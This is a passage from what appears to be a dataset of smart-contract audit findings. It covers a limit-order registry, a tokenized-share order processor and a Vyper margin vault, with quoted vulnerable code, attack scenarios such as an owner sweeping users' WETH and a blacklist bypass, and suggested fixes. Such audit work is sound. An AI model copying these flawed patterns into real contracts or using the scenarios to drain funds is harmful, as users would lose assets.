there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n }\\n```\\n\\nMost owners will automate replenishing the `LimitOrderRegistry` contract with LINK tokens to ensure its balance does not fall below zero and for ease of maintenance. For instance, a certain percentage of the collected ETH fee (e.g., 50%) will be swapped immediately to LINK tokens on a DEX upon collection and transferred the swapped LINK tokens back to the `LimitOrderRegistry` contract. The remaining will be spent to cover operation and maintenance costs.\\nHowever, the issue is that there are many Uniswap V3 pools where their token pair consists of ETH/WETH. In fact, most large pools in Uniswap V3 will consist of ETH/WETH. For instance, the following Uniswap pools consist of ETH/WETH as one of the pool tokens:\\nUSDC / ETH (0.05% Fee) (TLV: $284 million)\\nWBTC / ETH (0.3% Fee) (TLV: $227 million)\\nUSDC / ETH (0.3% Fee) (TLV: $88 million)\\nDAI / ETH (0.3% Fee) (TLV: $14 million)\\nAssume that the owner has configured and setup the `LimitOrderRegistry` contract to work with the Uniswap DAI/ETH pool, and the current price of the DAI/ETH pool is 1,500 DAI/ETH.\\nBob submit a new Buy Limit Order swapping DAI to ETH at the price of 1,000 DAI/ETH. Bob would deposit 1,000,000 DAI to the `LimitOrderRegistry` contract.\\nWhen Bob's Buy Limit Order is ITM and fulfilled, 1000 ETH/WETH will be sent to and stored within the `LimitOrderRegistry` contract.\\nThe next step that Bob must do to claim the swapped 1000 ETH/WETH is to call the `LimitOrderRegistry.claimOrder` function, which will collect the fee and transfer the swapped 1000 ETH/WETH to Bob.\\nUnfortunately, before Bob could claim his swapped ETH/WETH, the `LimitOrderRegistry.withdrawNative` function is triggered by the owner or the owner's bots. As noted earlier, when the `LimitOrderRegistry.withdrawNative` function is triggered, all the Native ETH and ERC20 WETH tokens on this contract will be transferred to the owner's address. As a result, Bob's 1000 swapped ETH/WETH stored within the `LimitOrderRegistry` contract are sent to the owner's address, and the balance of ETH/WETH in the `LimitOrderRegistry` contract is zero.\\nWhen Bob calls the `LimitOrderRegistry.claimOrder` function, the transaction will revert because insufficient ETH/WETH is left in the `LimitOrderRegistry` contract.\\nUnfortunately for Bob, there is no way to recover back his ETH/WETH that is sent to the owner's address. Following outline some of the possible scenarios where this could happen:\\nThe owners set up their infrastructure to automatically swap a portion or all the ETH/WETH received to LINK tokens and transfer them to the `LimitOrderRegistry` contract, and there is no way to retrieve the deposited LINK tokens from the `LimitOrderRegistry` contract even if the owner wishes to do so as there is no function within the contract to allow this action.\\nThe owners set up their infrastructure to automatically swap a small portion of ETH/WETH received to LINK tokens and send the rest of the ETH/WETH to 100 investors/DAO members' addresses. So, it is no guarantee that the investors/DAO members will return the ETH/WETH to Bob.чConsider implementing one of the following solutions to mitigate the issue:\\nSolution 1 - Only accept Native ETH as fee\\nUniswap V3 pool stored ETH as Wrapped ETH (WETH) ERC20 token internally. When the `collect` function is called against the pool, WETH ERC20 tokens are returned to the caller. Thus, the most straightforward way to mitigate this issue is to update the contract to `collect` the fee in Native ETH only.\\nIn this case, there will be a clear segregation between users' assets (WETH) and owner's fee (Native ETH)\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n uint256 nativeBalance = address(this).balance;\\n // Make sure there is something to withdraw.\\n// Remove the line below\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n// Add the line below\\n if (nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n// Remove the line below\\n // transfer wrappedNativeBalance if it exists\\n// Remove the line below\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\n\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value // Remove the line below\\n userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund); \\n } else {\\n// Remove the line below\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n// Remove the line below\\n // If value is non zero send it back to caller.\\n// Remove the line below\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n// Add the line below\\n revert LimitOrderRegistry__InsufficientFee;\\n }\\n..SNIP..\\n```\\n\\nSolution 2 - Define state variables to keep track of the collected fee\\nConsider defining state variables to keep track of the collected fee so that the fee will not mix up with users' assets.\\n```\\nfunction claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n// Add the line below\\n collectedNativeETHFee // Add the line below\\n= userClaim.feePerUser\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n// Add the line below\\n collectedWETHFee // Add the line below\\n= userClaim.feePerUser\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n\\n```\\nfunction withdrawNative() external onlyOwner {\\n// Remove the line below\\n uint256 wrappedNativeBalance = WRAPPED_NATIVE.balanceOf(address(this));\\n// Remove the line below\\n uint256 nativeBalance = address(this).balance;\\n// Add the line below\\n uint256 wrappedNativeBalance = collectedWETHFee;\\n// Add the line below\\n uint256 nativeBalance = collectedNativeETHFee;\\n// Add the line below\\n collectedWETHFee = 0; // clear the fee\\n// Add the line below\\n collectedNativeETHFee = 0; // clear the fee\\n // Make sure there is something to withdraw.\\n if (wrappedNativeBalance == 0 && nativeBalance == 0) revert LimitOrderRegistry__ZeroNativeBalance();\\n\\n // transfer wrappedNativeBalance if it exists\\n if (wrappedNativeBalance > 0) WRAPPED_NATIVE.safeTransfer(owner, wrappedNativeBalance);\\n // transfer nativeBalance if it exists\\n if (nativeBalance > 0) owner.safeTransferETH(nativeBalance);\\n}\\n```\\nчLoss of assets for the usersч```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n..SNIP..\\n```\\n -Users' funds could be stolen or locked by malicious or rouge ownersчhighчUsers' funds could be stolen or locked by malicious or rouge owners.\\nIn the contest's README, the following was mentioned.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nrestricted. the owner should not be able to steal funds.\\nIt was understood that the owner is not \"trusted\" and should not be able to steal funds. Thus, it is fair to assume that the sponsor is keen to know if there are vulnerabilities that could allow the owner to steal funds or, to a lesser extent, lock the user's funds.\\nMany control measures are implemented within the protocol to prevent the owner from stealing or locking the user's funds.\\nHowever, based on the review of the codebase, there are still some \"loopholes\" that the owner can exploit to steal funds or indirectly cause losses to the users. Following is a list of methods/tricks to do so.\\nMethod 1 - Use the vulnerable `withdrawNative` function\\nOnce the user's order is fulfilled, the swapped ETH/WETH will be sent to the contract awaiting the user's claim. However, the owner can call the `withdrawNative` function, which will forward all the Native ETH and Wrapped ETH in the contract to the owner's address due to another bug (\"Lack of segregation between users' assets and collected fees resulting in loss of funds for the users\") that I highlighted in another of my report.\\nMethod 2 - Add a malicious custom price feed\\n```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n\\nThe owner can create a malicious price feed contract and configure the `LimitOrderRegistry` to use it by calling the `setFastGasFeed` function.\\n```\\nFile: LimitOrderRegistry.sol\\n function performUpkeep(bytes calldata performData) external {\\n (UniswapV3Pool pool, bool walkDirection, uint256 deadline) = abi.decode(\\n performData,\\n (UniswapV3Pool, bool, uint256)\\n );\\n\\n if (address(poolToData[pool].token0) == address(0)) revert LimitOrderRegistry__PoolNotSetup(address(pool));\\n\\n PoolData storage data = poolToData[pool];\\n\\n // Estimate gas cost.\\n uint256 estimatedFee = uint256(upkeepGasLimit * getGasPrice());\\n```\\n\\nWhen fulfilling an order, the `getGasPrice()` function will fetch the gas price from the malicious price feed that will report an extremely high price (e.g., 100000 ETH), causing the `estimatedFee` to be extremely high. When users attempt to claim the order, they will be forced to pay an outrageous fee, which the users cannot afford to do so. Thus, the users have to forfeit their orders, and they will lose their swapped tokens.чConsider implementing the following measures to reduce the risk of malicious/rouge owners from stealing or locking the user's funds.\\nTo mitigate the issue caused by the vulnerable `withdrawNative` function. Refer to my recommendation in my report titled \"Lack of segregation between users' assets and collected fees resulting in loss of funds for the users\".\\nTo mitigate the issue of the owner adding a malicious custom price feed, consider performing some sanity checks against the value returned from the price feed. For instance, it should not be larger than the `MAX_GAS_PRICE` constant. If it is larger than `MAX_GAS_PRICE` constant, fallback to the user-defined gas feed, which is constrained to be less than `MAX_GAS_PRICE`.чUsers' funds could be stolen or locked by malicious or rouge owners.ч```\\nFile: LimitOrderRegistry.sol\\n function setFastGasFeed(address feed) external onlyOwner {\\n fastGasFeed = feed;\\n }\\n```\\n -Owners will incur loss and bad debt if the value of a token crashesчmediumчIf the value of the swapped tokens crash, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n\\nUsers only need to pay for the gas cost for fulfilling the order when they claim the order to retrieve the swapped tokens. When the order is fulfilled, the swapped tokens will be sent to and stored in the `LimitOrderRegistry` contract.\\nHowever, in the event that the value of the swapped tokens crash (e.g., Terra's LUNA crash), it makes more economic sense for the users to abandon (similar to defaulting in traditional finance) the orders without claiming the worthless tokens to avoid paying the more expensive fee to the owner.\\nAs a result, many users will choose not to claim the orders, which result in the owner being unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.чConsider collecting the fee in advance based on a rough estimation of the expected gas fee. When the users claim the order, any excess fee will be refunded, or any deficit will be collected from the users.\\nIn this case, if many users choose to abandon the orders, the owner will not incur any significant losses.чOwners might be unable to recoup back the gas fee the owner has already paid for automating the fulfillment of the orders, incurring loss and bad debt.ч```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n..SNIP..\\n // Transfer fee in.\\n address sender = _msgSender();\\n if (msg.value >= userClaim.feePerUser) {\\n // refund if necessary.\\n uint256 refund = msg.value - userClaim.feePerUser;\\n if (refund > 0) sender.safeTransferETH(refund);\\n } else {\\n WRAPPED_NATIVE.safeTransferFrom(sender, address(this), userClaim.feePerUser);\\n // If value is non zero send it back to caller.\\n if (msg.value > 0) sender.safeTransferETH(msg.value);\\n }\\n```\\n -Owner unable to collect fulfillment fee from certain users due to revert errorчmediumчCertain users might not be able to call the `claimOrder` function under certain conditions, resulting in the owner being unable to collect fulfillment fees from the users.\\n```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true means that the input token is token0.\\n if (userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n\\nAssume the following:\\nSHIB has 18 decimals of precision, while USDC has 6.\\nAlice (Small Trader) deposited 10 SHIB while Bob (Big Whale) deposited 100000000 SHIB.\\nThe batch order was fulfilled, and it claimed 9 USDC (totalTokenOut)\\nThe following formula and code compute the number of swapped/claimed USDC tokens a user is entitled to.\\n```\\nowed = (totalTokenOut * depositAmount) / totalTokenDeposited\\nowed = (9 USDC * 10 SHIB) / 100000000 SHIB\\nowed = (9 * 10^6 * 10 * 10^18) / (100000000 * 10^18)\\nowed = (9 * 10^6 * 10) / (100000000)\\nowed = 90000000 / 100000000\\nowed = 0 USDC (Round down)\\n```\\n\\nBased on the above assumptions and computation, Alice will receive zero tokens in return due to a rounding error in Solidity.\\nThe issue will be aggravated under the following conditions:\\nIf the difference in the precision between `token0` and `token1` in the pool is larger\\nThe token is a stablecoin, which will attract a lot of liquidity within a small price range (e.g. $0.95 ~ $1.05)\\nThe rounding down to zero is unavoidable in this scenario due to how values are represented. It is not possible to send Alice 0.9 WEI of USDC. The smallest possible amount is 1 WEI.\\nIn this case, it will attempt to transfer a zero amount of `tokenOut,` which might result in a revert as some tokens disallow the transfer of zero value. As a result, when users call the `claimOrder` function, it will revert, and the owner will not be able to collect the fulfillment fee from the users.\\n```\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\nчConsider only transferring the assets if the amount is more than zero.\\n```\\nuint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n// Transfer tokens owed to user.\\n// Remove the line below\\n tokenOut.safeTransfer(user, owed);\\n// Add the line below\\n if (owed > 0) tokenOut.safeTransfer(user, owed);\\n```\\nчWhen a user cannot call the `claimOrder` function due to the revert error, the owner will not be able to collect the fulfillment fee from the user, resulting in a loss of fee for the owner.ч```\\nFile: LimitOrderRegistry.sol\\n function claimOrder(uint128 batchId, address user) external payable returns (ERC20, uint256) {\\n Claim storage userClaim = claim[batchId];\\n if (!userClaim.isReadyForClaim) revert LimitOrderRegistry__OrderNotReadyToClaim(batchId);\\n uint256 depositAmount = batchIdToUserDepositAmount[batchId][user];\\n if (depositAmount == 0) revert LimitOrderRegistry__UserNotFound(user, batchId);\\n\\n // Zero out user balance.\\n delete batchIdToUserDepositAmount[batchId][user];\\n\\n // Calculate owed amount.\\n uint256 totalTokenDeposited;\\n uint256 totalTokenOut;\\n ERC20 tokenOut;\\n\\n // again, remembering that direction == true means that the input token is token0.\\n if (userClaim.direction) {\\n totalTokenDeposited = userClaim.token0Amount;\\n totalTokenOut = userClaim.token1Amount;\\n tokenOut = poolToData[userClaim.pool].token1;\\n } else {\\n totalTokenDeposited = userClaim.token1Amount;\\n totalTokenOut = userClaim.token0Amount;\\n tokenOut = poolToData[userClaim.pool].token0;\\n }\\n\\n uint256 owed = (totalTokenOut * depositAmount) / totalTokenDeposited;\\n\\n // Transfer tokens owed to user.\\n tokenOut.safeTransfer(user, owed);\\n```\\n -Bypass the blacklist restriction because the blacklist check is not done when minting or burningчhighчBypass the blacklist restriction because the blacklist check is not done when minting or burning\\nIn the whitepaper:\\nthe protocol emphasis that they implement a blacklist feature for enforcing OFAC, AML and other account security requirements A blacklisted will not able to send or receive tokens\\nthe protocol want to use the whitelist feature to be compliant to not let the blacklisted address send or receive dSahres\\nFor this reason, before token transfer, the protocol check if address from or address to is blacklisted and the blacklisted address can still create buy order or sell order\\n```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n\\nthis is calling\\n```\\nfunction requireNotRestricted(address from, address to) external view virtual {\\n // Check if either account is restricted\\n if (blacklist[from] || blacklist[to]) {\\n revert AccountRestricted();\\n }\\n // Otherwise, do nothing\\n}\\n```\\n\\nbut as we can see, when the dShare token is burned or minted, the blacklist does not apply to address(to)\\nthis allows the blacklisted receiver to bypass the blacklist restriction and still send and receive dShares and cash out their dShares\\nbecause the minting dShares is not blacklisted\\na blacklisted user create a buy order with payment token and set the order receiver to a non-blacklisted address\\nthen later when the buy order is filled, the new dShares is transferred and minted to an not-blacklisted address\\nbecause the burning dShares is not blacklisted\\nbefore the user is blacklisted, a user can frontrun the blacklist transaction to create a sell order and transfer the dShares into the OrderProcessor\\nthen later when the sell order is filled, the dShares in burnt from the SellOrderProcess escrow are burnt and the user can receive the payment tokenчIssue Bypass the blacklist restriction because the blacklist check is not done when minting or burning\\nimplement proper check when burning and minting of the dShares to not let user game the blacklist system, checking if the receiver of the dShares is blacklisted when minting, before filling sell order and burn the dShares, check if the requestor of the sell order is blacklisted\\ndo not let blacklisted address create buy order and sell orderчBypass the blacklist restriction because the blacklist check is not done when minting or burningч```\\n function _beforeTokenTransfer(address from, address to, uint256) internal virtual override {\\n // Restrictions ignored for minting and burning\\n // If transferRestrictor is not set, no restrictions are applied\\n\\n // @audit\\n // why don't you not apply mint and burn in blacklist?\\n if (from == address(0) || to == address(0) || address(transferRestrictor) == address(0)) {\\n return;\\n }\\n\\n // Check transfer restrictions\\n transferRestrictor.requireNotRestricted(from, to);\\n }\\n```\\n -Escrow record not cleared on cancellation and order fillчmediumчIn `DirectBuyIssuer.sol`, a market buy requires the operator to take the payment token as escrow prior to filling the order. Checks are in place so that the math works out in terms of how much escrow has been taken vs the order's remaining fill amount. However, if the user cancels the order or fill the order, the escrow record is not cleared.\\nThe escrow record will exists as a positive amount which can lead to accounting issues.\\nTake the following example:\\nOperator broadcasts a `takeEscrow()` transaction around the same time that the user calls `requestCancel()` for the order\\nOperator also broadcasts a `cancelOrder()` transaction\\nIf the `cancelOrder()` transaction is mined before the `takeEscrow()` transaction, then the contract will transfer out token when it should not be able to.\\n`takeEscrow()` simply checks that the `getOrderEscrow[orderId]` is less than or equal to the requested amount:\\n```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n\\nCancelling the order does not clear the `getOrderEscrow` record:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata order, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // Prohibit cancel if escrowed payment has been taken and not returned or filled\\n uint256 escrow = getOrderEscrow[orderId];\\n if (orderState.remainingOrder != escrow) revert UnreturnedEscrow();\\n\\n\\n // Standard buy order accounting\\n super._cancelOrderAccounting(order, orderId, orderState);\\n }\\n}\\n```\\n\\nThis can lead to an good-faith and trusted operator accidentally taking funds from the contract that should not be able to leave.\\ncoming up with the fact that the transaction does not have deadline or expiration date:\\nconsider the case below:\\na good-faith operator send a transaction, takeEscrow\\nthe transaction is pending in the mempool for a long long long time\\nthen user fire a cancel order request\\nthe operator help user cancel the order\\nthe operator send a transcation cancel order\\ncancel order transaction land first\\nthe takeEscrow transaction lands\\nbecause escrow state is not clear up, the fund (other user's fund) is taken\\nIt's also worth noting that the operator would not be able to call `returnEscrow()` because the order state has already been cleared by the cancellation. `getRemainingOrder()` would return 0.\\n```\\n function returnEscrow(OrderRequest calldata orderRequest, bytes32 salt, uint256 amount)\\n external\\n onlyRole(OPERATOR_ROLE)\\n {\\n // No nonsense\\n if (amount == 0) revert ZeroValue();\\n // Can only return unused amount\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 remainingOrder = getRemainingOrder(orderId);\\n uint256 escrow = getOrderEscrow[orderId];\\n // Unused amount = remaining order - remaining escrow\\n if (escrow + amount > remainingOrder) revert AmountTooLarge();\\n```\\nчClear the escrow record upon canceling the order.чIssue Escrow record not cleared on cancellation and order fill\\nInsolvency due to pulling escrow that should not be allowed to be takenч```\\n bytes32 orderId = getOrderIdFromOrderRequest(orderRequest, salt);\\n uint256 escrow = getOrderEscrow[orderId];\\n if (amount > escrow) revert AmountTooLarge();\\n\\n\\n // Update escrow tracking\\n getOrderEscrow[orderId] = escrow - amount;\\n // Notify escrow taken\\n emit EscrowTaken(orderId, orderRequest.recipient, amount);\\n\\n\\n // Take escrowed payment\\n IERC20(orderRequest.paymentToken).safeTransfer(msg.sender, amount);\\n```\\n -Cancellation refunds should return tokens to order creator, not recipientчmediumчWhen an order is cancelled, the refund is sent to `order.recipient` instead of the order creator because it is the order creator (requestor) pay the payment token for buy order or pay the dShares for sell order\\nAs is the standard in many L1/L2 bridges, cancelled deposits should be returned to the order creator instead of the recipient. In Dinari's current implementation, a refund acts as a transfer with a middle-man.\\nSimply, the `_cancelOrderAccounting()` function returns the refund to the order.recipient:\\n```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n _closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n\\nRefunds should be returned to the order creator in cases where the input recipient was an incorrect address or simply the user changed their mind prior to the order being filled.чReturn the funds to the order creator, not the recipient.чPotential for irreversible loss of funds\\nInability to truly cancel orderч```\\n function _cancelOrderAccounting(OrderRequest calldata orderRequest, bytes32 orderId, OrderState memory orderState)\\n internal\\n virtual\\n override\\n {\\n // rest of code\\n\\n uint256 refund = orderState.remainingOrder + feeState.remainingPercentageFees;\\n\\n // rest of code\\n\\n if (refund + feeState.feesEarned == orderRequest.quantityIn) {\\n _closeOrder(orderId, orderRequest.paymentToken, 0);\\n // Refund full payment\\n refund = orderRequest.quantityIn;\\n } else {\\n // Otherwise close order and transfer fees\\n _closeOrder(orderId, orderRequest.paymentToken, feeState.feesEarned);\\n }\\n\\n\\n // Return escrow\\n IERC20(orderRequest.paymentToken).safeTransfer(orderRequest.recipient, refund);\\n }\\n```\\n -`reduce_position` doesn't update margin mapping correctlyчhighч`reduce_position` function decrease the margin amount of the position but doesn't add it back to the user's margin mapping, making it impossible to withdraw the margin.\\nAfter selling some position tokens back against debt tokens using `reduce_position` function, `debt_shares` and `margin_amount` are reduced proportionally to keep leverage the same as before:\\nVault.vy#L313-L330\\n```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n\\nHowever, even though some of the margin have been paid back (position.margin_amount has been reduced), `self.margin[position.account][position.debt_token]` mapping hasn't been updated by adding `reduce_margin_by_amount` which would allow the user to withdraw his margin.чConsider modifying the code like this:\\n```\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n+ self.margin[position.account][position.debt_token] += reduce_margin_by_amount\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\nчUsers will lose their margin tokens.ч```\\ndebt_amount: uint256 = self._debt(_position_uid)\\n margin_debt_ratio: uint256 = position.margin_amount * PRECISION / debt_amount\\n\\n\\n amount_out_received: uint256 = self._swap(\\n position.position_token, position.debt_token, _reduce_by_amount, min_amount_out\\n )\\n\\n\\n # reduce margin and debt, keep leverage as before\\n reduce_margin_by_amount: uint256 = (\\n amount_out_received * margin_debt_ratio / PRECISION\\n )\\n reduce_debt_by_amount: uint256 = amount_out_received - reduce_margin_by_amount\\n\\n\\n position.margin_amount -= reduce_margin_by_amount\\n\\n\\n burnt_debt_shares: uint256 = self._repay(position.debt_token, reduce_debt_by_amount)\\n position.debt_shares -= burnt_debt_shares\\n position.position_amount -= _reduce_by_amount\\n```\\n -Leverage calculation is wrongчhighчLeverage calculation is wrong which will lead to unfair liquidations or over leveraged positions depending on price movements.\\n`_calculate_leverage` miscalculate the leverage by using `_debt_value + _margin_value` as numerator instead of `_position_value` :\\nVault.vy#L465-L477\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nThe three inputs of the function `_position_value`, `_debt_value` and `_margin_value` are all determined by a chainlink oracle price feed. `_debt_value` represents the value of the position's debt share converted to debt amount in USD. `_margin_value` represents the current value of the position's initial margin amount in USD. `_position_value` represents the current value of the position's initial position amount in USD.\\nThe problem with the above calculation is that `_debt_value + _margin_value` does not represent the value of the position. The leverage is the ratio between the current value of the position and the current margin value. `_position_value - _debt_value` is correct and is the current margin value, but `_debt_value + _margin_value` doesn't represent the current value of the position since there is no guarantee that the debt token and the position token have correlated price movements.\\nExample: debt token: ETH, position token: BTC.\\nAlice uses 1 ETH of margin to borrow 14 ETH (2k USD/ETH) and get 1 BTC (30k USD/BTC) of position token. Leverage is 14.\\nThe next day, the price of ETH in USD is still 2k USD/ETH but BTC price in USD went down from 30k to 29k USD/BTC. Leverage is now (_position_value == 29k) / (_position_value == 29k - _debt_value == 28k) = 29, instead of what is calculated in the contract: (_debt_value == 28k + _margin_value == 2k) / (_position_value == 29k - _debt_value == 28k) = 30.чConsider modifying the code like this:\\n```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n- * (_debt_value + _margin_value)\\n+ * (_position_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n )\\n```\\n\\nEscalate for 10 USDC. My report shows why the current used formula is wrong as it does not take into account that debt tokens and position tokens are not necessarily tokens with correlated prices. The duplicate #100 shows in another way that the formula fail to calculate the leverage of a position correctly. The impact is the same, but my report highlight `_debt_value + _margin_value != _position_value`, the same way that the debt against a house is not equal to the market value of this house (also described in another way in #156). The definition of leverage used in the code is not correct and will lead to unfair liquidations or over leveraged positions, which is definitely high severity.\\nUnexpected and unfair liquidation could cause loss to users. Since the issue roots from the formula, the loss could be long term, result in accumulated fund loss for users, can can be deemed as \"material loss of funds\".\\nBased on the above, high severity might be appropriate.\\nUnstoppable-DeFi\\nhrishibhat\\n@Unstoppable-DeFi based on the above escalation it seems to be a high issue. Is there any other reason this should not be a high-severity issue?\\nhrishibhat\\nResult: High Has duplicates Considering this issue a valid high\\nsherlock-admin2\\nEscalations have been resolved successfully!\\nEscalation status:\\ntwicek: acceptedчLeverage calculation is wrong which will lead to unfair liquidations or over leveraged positions depending on price movements.ч```\\ndef _calculate_leverage(\\n _position_value: uint256, _debt_value: uint256, _margin_value: uint256\\n) -> uint256:\\n if _position_value <= _debt_value:\\n # bad debt\\n return max_value(uint256)\\n\\n\\n return (\\n PRECISION\\n * (_debt_value + _margin_value)\\n / (_position_value - _debt_value)\\n / PRECISION\\n 